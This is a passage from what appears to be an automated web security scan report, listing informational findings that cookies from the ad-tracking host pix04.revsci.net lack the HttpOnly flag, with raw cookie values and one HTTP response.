8tlGv96HYrlNfrIVhi5C6uRanp26QbkxI=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:15:55 GMT; Path=/
rtc_1ITi=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:15:55 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.119. http://pix04.revsci.net/H07707/b3/0/3/0806180/949356899.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07707/b3/0/3/0806180/949356899.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPNOE/FLnIQlrWdI00WdC2M5e+iH53YApI1XQ1VhIIo+uLeylJ24IzIDUVJoi+vnOqW9W/ZJZlixYxplxRO0W1JvkWpOEh6HITQG7wwtuWBy03DV2z/vqwD6stqsWyVtod2+y613Cs++rbRUfxEWWduyC6rDKAMyfYjERD/tzztSnr+CAtqaB92apUcZdvwPRCFqDZWn9No0zlL4k/buv/yOKhRX9tiffPrBsrIQ/ZRWwIlm22f8I7/9F5nFFM=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:28:19 GMT; Path=/
rtc_66oE=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+Err//DyFLu1LNxozaNrNCnxTv/CPBK4vwUC37I+Pw2DxDH9eVMUC9zB1mGK9JGee2kZ/rkxh9ZhsvGXmyp1GIOejNCcp29JzcATN8GDRgxtWQLVIrfqXjLYkKxH2Wkot1CcCcHEV+imu9mtVtV+fEsoPqb8Sx0EexVQw7FtCen+/ihLI/zuRtzoISDJn1i335fn+91HWdFyleqRqt2FFYHQRSR0n0huHL1bBQL7IuGA/Tq/HBv4FOro1WSc6yqw+2xjgQcQAAMVLamZ29iRGSHkD6u/g3+COdPKCC+G/59; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:28:19 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.120. http://pix04.revsci.net/H07707/b3/0/3/0806180/955065746.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07707/b3/0/3/0806180/955065746.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPF4kmheQIMDjaxY4NY56qG7poa4ScLEaatLDiorNn5vw/ZUtic7CPZq60bIzTlnSCIjQNpmQyiPpn1WLZYGIVHHqRL8VuyK4KTktWpKfhIdHIBwclAI+6iD3yXxATNyXVdCP9qr5pUf86eVqDRYrXnrWOQjJGgQmy7sH3W0QYN9ncBmAi6AFeBtqgO+BHtTmqf+IwWdMW+vn20BWfxvnJZS8x1vTAmlPu7yTn9sxzlDvQISj2WEjZNX5rXV5ukaTRHGuM2yeuQT4RICgZT5x2mDJvn8tq9GJ7UH/gE6iPm5BKu3WqKlqylGDQsXLxPXLrxUvqZgL/GXlsGJHcV2yLjheFx52zg/AdJWYX0xIqaWFDAinkd+HFgH/FBcPcf5PGHkf42QFcsCVqWq77hxoYmwYkrpfC7Hs8gZrse1DI9+qNwbwtyVVHII0+JZJa1OaEzmF6Zw8e7llMjMyCkhULZ21J9kYowe2hqB6T83cVhkCcqx3pt3vCz1JWV+51wLTq7ZHPu9iPjPSzpK3S+ft1SGY1b15QeMEL8FbeKr45VXaZhA4iyTvuoNgHNfM4RL0j14Zwe6y/gSeW4/l5ymzNyQzM12yygrhnseP7s6I4K6us+leNumjaJC9k3cVu4QDEHOzhNyKcgXRPKR6gAcB3t2p1c8fRmMC21jut4cMEEvTt3lVnG2tZCeaSekeLOhtKQ80CKe8cDI/Itmn0obtX7sv8Dvtv6ozqmfUmuDvrZQehyH8PrPZJ1UY7KtrppAQs+iQ3T5Va0el3exUNrNzcBtjOoKtqoeUJlY123acnt3TP1StLZgYrwdJ1I; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:40:06 GMT; Path=/
rtc_u0Bh=MLvv+TUxJohm57br/FOrg2mN7irC3DjP1ChBHkkDb2IH8Z6qLwZuWqGjy/Xuyg8v3sLBnXh6nihFPfp5QX5po+dN7bkhx0QKD/5YN7WzJvEDzwSyPz62Cul+KglQgrX5vPPAe1CK28tHuk74SxbuB/5g6RILMlAqYeIB0b2WQ2t28icY+SrSW/6Kzkes3pUyJBJi3gt1fxDymPsZXtPKBYKayaDMoE+LgxBJ/Z3oV8cJo6xGzO9MLZzrsI+PM2wT9lcWsIQeqULwQ3sZ26fAMT8TUCTApzuN6ZfsvZBUX4Bn/9Nttluzu8pI+x201/iywameeIYU+xIwlOP44MexBIqTFjZxYkFnT6r/d1xrzVq8hABxsk6HQLKkVQ/hufkg0OV12sNiozq3QmmpdvMOeaz9oYijP8Jqz9sVES6wIJrY912WZUq86mAotiqSp7Aip5Di4j5G1EPb1WYFoJ75Mn1juc21COMuyJ1PAOrNoYcVp62fXYeuSrC5/wvdhnnl2ikfBv/Q8Mlhgc2B+mf8H3iYB0pOJeuoERtZrxEVSqGJNpqZHfSiX+/P6eWdV8VVrbqa07+7Re8BjtCkk3J++p8aWiZ5tmvfMTlGdi0tBBnd++BjGRuXe5gf44V3TFnjLg6CEA+ItNtFpPoN+VTrtekt7fWHiv9qZxRUrY3oWjLEDhrNcvxHqtM7ajrkbGmSSDnOnwEw5CTl5P34hl7zLs6myZ89x4lRsUJjk+cus7GKc2W1iQtJmLku/F7YmQVRJD3bBY5KH8QMlQKaAnyi9CuofxqdgpmMPSjiQhKouroR+/5UPL+Mv5z+NaIRq0wVq923bzwc3TVwQQI36BpdIH+tXXF/s54FuB7KkQXXismKvJY0urrqkoe/scuBgc9ludNQuaoer52Joj3ZNHYX4Cly0xE7arjUI4S3e7FIou3+8kbkKmLPPI9ROTHv+iDDW0B+4N6rxV9SSd1czMHvAIGnyDEiOQWbG6WD9Sz8tI8tEpX49F/AXT4rbr7ZvYfmjlVjVOmpRk6yDItMM6qbS2nOrGz7e2IUZ2WsOtANwymQ+1fkpA6GgxYTod2bQVP8b3VHhay2n6s5GiR7taZwMTqWwf6JaYzaQwo80gCKJaHnFvQN5/YfXrWj8VeDTDpEi343GY9za4OFbFIZv0LrWuvS0OVFXmetkxHqZFhwM7E+1pgyN+BYZvKN7vG6Vm47Sot7+qpSdK0ALf+2NHpOr3Gl3LwpIIo3VFbL51D8V+aMR3DgHuQf8ZvcZhX4Xbr4FOwpfCtHmdTRGEVzeUkL8LZamEtwj4w6Yz+LWxhw81gLO1Wuk+uAt/XYjl6syapSuyDgjtcs2erJi5FuUafQ2ouwbVh+EtK4zJekoeuQTScrBVWaIsIeN4pPvucKoNxcpriPW9fGVnUbJC7RLoQdh/F/V56dVpJxoymviwHrhGSNWr6V6rFz0mj4TGPRrrYDLz4P5tGDIw+bsClu3qVMIrbr+iZoyjj95GxxVFGn+GK8a2SvWD2SQY5E00xSBkHhEggHdCmbZy0W58DQGjkpHkbUNZrD1pQoJWvrKUDqRqQaq76AKojnIMK8UBv+lTvPAukuHf/CV3FAWzP3s/3akxHYHewjdMtaPoohOkyozTgM4fn4KyK36Bkx8OXS9/Y9RNMjdMk9bN7kN9K1r9YocIHCprV5QsKqzDdUGZFNsd0K7vjhqnxIawZEekSftzrzr+V4PBpqXHyvrMz2xJR8Mm/BNFzivwyc6N5H+3VwKkU5mMzaXTqdgMPBb21rbXuFqjapzAshj7aq3pOIw1WMNXDMUD/lzcx+HVg2zKjKeNuhcU98EgbGfaTd8lqdHo8e04Br8g4y/WOnYP5P8hlflZ3H5NJx7gNJhqwhXEPxCJQJnbMy8agJi8SCvgybh0VM6RFknfAjzKiHkx71x/uJra8Op+U7vrMBkFtL/E+m4C8c8Z+Ei3YwigXXHGAinyqBElDKt2OXpzrs5dbpF8aXYd+tQbQFDfNmLP+kPq+uf4WuEQfSSqvwxT4bQnK6GHjn87PxfKPVqRgvf9Pf+BSiqslMY++NGjq39PP+L5KwipVGVgx0exRgGLKUCazhEScXnQR7bph2Fmt1LkGj0R1sQCwlJSi6iVxq8T4J7K+20X9K+hCUasUevqLWvFn423U2U31SPTP67gzqAtD5AFa9VT2IVFAKU4/zLc/sgH4VO37wxL3iNZ7mafyN1thMZakPxlR2iESZQamufwdLkrM5aoG84loT0/TRxv6+OMRd/qLK+JDSBNIV78X2nW0vnubOIxWAGCC2qs7m0TeyvDgUXVGrkUWHD6zrQFepj58ZyPUR55QDAsNOv15Oai7mpLQgzP+HG0hEctmFoEjAtlJTyLfGfKaVOtIP3PNzJwotx+qZMBQ2A1bkJQrrv0Tpna46xVNWMgKEkyfGMN4QVKoPSRnLpuIpS1V0uh663fu+9GzRvnBAaOs8+IeU4bU3aARm0G6HYzeSlPY6VSmca2XlLlDJoxYnT+TQWIX4fPlY4eie4qjs5y22jxYd5U9aYM5Fdq2X5wdPg9T6Do+OZcRV7yXenEb6UwSDf3RSAm0IY+SD8ipE9LwBZvhfmJdFeEr0R405UAb4866ScRZRKQXvpb30RXkj6tqRSb01fmAPW4zIxeirqQiOXvD31vw5+mO+tvvXbK6z7h9WtctO9lQvhzCNEOmY5pQJIw33vytolFLDAbLUBYj/rhTME43fKZmQdGKEbA==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:40:06 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_7N2M=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4kmheQIMDjaxY4NY56qG7poa4ScLEaatLDiorNn5vw/ZUtic7CPZq60bIzTlnSCIjQNpmQyiPpn1WLZYGIVHHqRL8VuyK4KTktWpKfhIdHIBwclAI+6iD3yXxATNyXVdCP9qr5pUf86eVqDRYrXnrWOQjJGgQmy7sH3W0QYN9ncBmAi6AFeBtqgO+BHtTmqf+IwWdMW+vn20BWfxvnJZS8x1vTAmlPu7yTn9sxzlDvQISj2WEjZNX5rXV5ukaTRHGuM2yeuQT4RICgZT5x2mDJvn8tq9GJ7UH/gE6iPm5BKu3WqKlqylGDQsXLxPXLrxUvqZgL/GXlsGJHcV2yLjheFx52zg/AdJWYX0xIqaWFDAinkd+HFgH/FBcPcf5PGHkf42QFcsCVqWq77hxoYmwYkrpfC7Hs8gZrse1DI9+qNwbwtyVVHII0+JZJa1OaEzmF6Zw8e7llMjMyCkhULZ21J9kYowe2hqB6T83cVhkCcqx3pt3vCz1JWV+51wLTq7ZHPu9iPjPSzpK3S+ft1SGY1b15QeMEL8FbeKr45VXaZhA4iyTvuoNgHNfM4RL0j14Zwe6y/gSeW4/l5ymzNyQzM12yygrhnseP7s6I4K6us+leNumjaJC9k3cVu4QDEHOzhNyKcgXRPKR6gAcB3t2p1c8fRmMC21jut4cMEEvTt3lVnG2tZCeaSekeLOhtKQ80CKe8cDI/Itmn0obtX7sv8Dvtv6ozqmfUmuDvrZQehyH8PrPZJ1UY7KtrppAQs+iQ3T5Va0el3exUNrNzcBtjOoKtqoeUJlY123acnt3TP1StLZgYrwdJ1I; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:40:06 GMT; Path=/
Set-Cookie: rtc_u0Bh=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:40:06 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:40:06 GMT
Content-Length: 1269

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','H07707_10872','D08734_72078','H07707_10950','H07707_10954','H07707_10987','
...[SNIP]...

14.121. http://pix04.revsci.net/J07717/b3/0/3/1003161/451564742.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/J07717/b3/0/3/1003161/451564742.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPF4k+huHIQJvAtY6gquhqs9vksg7ZjGgbPT28I6QQ4O3XYuv3lSTtqNncA2iFgL+J8wQfFRGQkQ2U54M8TCv5T35XD+5ksRl9Uj7OPMmjOFbBgwT0BsKikEDJN/pMm5X0yDXRc1h/0I2NQ8eJlLg63pEKsg0I5wRadNzLTPMV2MpQRwwmT/QbrfyjFZmgC89KD+nUpvWSdQ0wLW6bYmJZ7cmDDJEbgHGkLxfgiXJ68tEV73gfcwOU6lk0j8m4wERf4UpHaqSxIrHw3GVEmGaBl/7kAyGM1sPFVj2vGfhXDoDoLz3wTlA7PsyDlPerjLLFCRBHNjzixQIoOMVs6a8C6bS4Cg++CzRol5QBabiMZ8IY15O/+l0G0QUQJ6AnsDsZlcVhxyiGUl2J3ysiVilfqOCo2vwsU8C4i/nixMJHpiJB5gCkGjQB6TBofo3xP646PFvsX8kOpyqgsbT3BiIEL6nrQrMIgeqbTfYkLHEZWl72/x+3BYjdULstkAApVgtTwD0m3SiY2Ib4pf3quhFEC20316c1d+ZzYPyyr2BuSz00aW+J69QcgLICR9NS4BJvaPZRs/OzE8MKALlcm0B3Mbc57N2Ws6jWqp7eE9Qo7M4FeanFmoG7z2hLMGUHFTkDWZR5yLMMKaqxxIvHT192MSXeBaiBx80slyc8gSqxX7rKbOJzYHGFV4i+URd16G7HzRXDdyvB20JlAOrMf7n0siam4TC00Mw/YvpjjbLWHyZ0dnQsonZtjgQ5iHhzvjHR0YICte13QDmwSAYDg0o2Z4B7LfU4=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:03:16 GMT; Path=/
rtc_yv6E=MLvv+TMxJohmprbr/FOrg2mNvsIotYBFSXnXGp85AnkmVGe7pmFq+vDasKu3UCzJrIUFRJjHM3y24XIoxzWYaHpPK/ANRh0tzzRwZjFkB2TqggeS4W92jOOrAKTjVv7a9EbCfaDI/8+32MZIvKm8ZIgUvOYW47gPLRHGmUXq0pqmz0yG/4aszFb2p2Jhtglky0gn0Vcq2KOg4iWIc9DK5ItjIdjLIug+LsA9elvc/D8BYJClYOAVjs3imp6qNSc7Wan20jUBNKfKiEyZHjkXJAyDARylN0liiVTbNphhnJafqgzUj2uDOWSxgzaS7YBbLOeT2a10R1KDEK2tI1ULUFLZ6vksyczwgMc4P9mQWrU2IYAot4JiARUindoKhLT8FDwzyFf3b8P3QKAKVr9n1MYNvaIhDqDS7FjXkUCmWo0VV76+KOwwqoe9t2rUvF/3e1Bl424TwfmlaYZfWDjz9O2acj9pVn/R9EwywmAafu10Eqm+w8GRbZdDOcVHhor12OrgNPlNHvtWiQc9n1Nr9qLH3n/J+Cl55VgYvG+eXZyFDSyQG4li2kHUzC9Hn1nAmVVzJRlan3c1t21dO7V6iaw/ZX59p90/k26RlUady6utaV14L0Rm8x7pp8nxx/r4VPIasCa4DsbIuBJyphJNLIbOF/8pvWU/Oy8cLZ0bUCg0ME/KOpbsjpChdO8CmBUHo5cAhy1sMJIytoA6ARyzrx3SVcOaHWqFv5i5mTuc+FxBTAvhXnLogmTHGxoW2gSVeKSYa1ZGg2oxkSbbaKA1ALrXo0Le6PoDrfzaNtMRXcNvGUtfb8R8zmmC1L04bQNv6/g5b8EfG2xDfv2pVfVOLo6ff/0nSR0l1DtGtv0yyNSdtp1uh6xJ4eJ8pBGmaTMO+t/mPRmN9RQREmOdhsx0zsTxAN9vcsieYqfC/ZpBcc2sOYG1hnnILYTI3wKW0/V4cUDbt6GagbpZv6cD3rFnXObJRXQ7Es13wCofsd754dM3qXNlFSC9ee6PPok4ndQGYxmmoxFc+ARGS1GZ/dkc2xctQvaSv/CvRi4Qt+bmmi+mR81bkRpel83DoRs/5ELDLpRC3zlCFVZ9fZYqH+vm9k/vEW2fNIEyJ2R5aGEHJUfjvGYTWg8nS9ppmlXjNEv8ac9foSe8ZVxuhwRQKPzntFh0n5/dnBitioeRcQeS5qWkLlhCFs1O2rhRzjnJJz+i8NAL/wYWLZU0wEMsz/gFNnfcfBFtVt1XAIfz5XK1d1r9gfAVC08rdymeWF8ZzCitGsS5nw6FYA8FjzIhZlI3gAPupBvDfrlrDt5hiZaPecub/at7V+PzlIBjgA5fRdlwg04RI5GxPrHPNYVfwPvwUR+kcfb5otEILpN0hI738J9IMQVitoW2LAnLCDEM6YDnGOHTvDu1TI7N5KgIkf3itmXOfi9p0nMJtn2WLCO/zEUFowlRDdIH4+1GeH6zx0nyfySJPRE1wAqMQNUzWK4JMunDeNy/xc6jfdcknGS/bJBg9DDgDQ+Zh8ImEEaTAi64LpMauB47hF5XtpnFr4HrjIlBowd3Zp14k/MBFKrQqttAR2anyiuOGFv8LGu1taKado92WukRuSAWw2neiHKwPdxfG0jITETHTJFmQzOUc1iv4Tlh7TpBg40qHwsQTxTvtLohFVW/yCvn8A225IQYTu+O1M8gAQ0ryRVZSjgTPdsGu7XxU+q5Dvkjgci6XfnmIME2+04f6nzGhtpGDVIddPVYoAd8o+YgbMJ96KoonoXqCNOgnTv5QUoSVdMU8/yIkoR8z3e4SCZLVmvGIBtj1IxcB0QRpdRVWJCB8iVLMj/GslP7i/IuygkF+tBEvKDh/lsBHUhb/VBkKgjh4JgGKKNJeukilSnLZ3k1Zt7djl/19oIuSbSEBn+naO5w5Ym8k0L02qGVRS+ErEvc1yGUct+k8Wq9aoP/+MneYgLVVj6MQAEMwjfhZYOgyA7a9NLfk9P4Yf+hYo1D95lCnR22jjV9nx64TzclzupEL4LskhRTAL/iUEb14gttjbvxwO+D/cA0/hmjrlNdc1dtsTzcox5k0pysX4GVTH5LWybuRkMWXKrVBvro6DxST3juwPdYJ8km/Tzgx0ytbhwHh0609yJeds9yt2/QL55qiQrAUo/9pEijNIdJ9nW9avBvKJ5s1Nz1hRK0L3LSY9ttZiKddQ1sEChcUdh/CawI+NJXaHkliroPnVPCxb6lYkgtQNW+VZlL8mB44aVgUgFzZJ/d/Iz4OKu98BrFo35OXlkQDJF2Rq5NQ+dJOHdu75GE2He0G2wtA9Yq05LC+hCnJZmfeyIbXUuAtTrbkfIMwdXBCMOfSqjeISv1uG+Zhi+zcdaOjYrIJMB0hucWT83KDaAGuQkFHWJ2T80zC2+LtpLfv6IimDkq/Gpgc/CpkZXY8yn+SvEQhPjFt1ncahj8pJZBgbYgqmHP3XsfGZxfcmHEHvCTiIy5js2rxOHiGUe4idVEUYt/fJHDCIOvgQMCdKBR6oJbK++XUUWu+EXeHad0VfO7mRpDFNb3fau6ciWxx6+XehQKJHyubd9ZDNXDOaevL43L1iEWvIbsZeA4Rp9HOT74ml9QcT89kpF8YM4H4rwDH4cvaQIdew==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:03:16 GMT; Path=/
NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a874&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Thu, 09-Jun-2011 11:03:16 GMT; Path=/

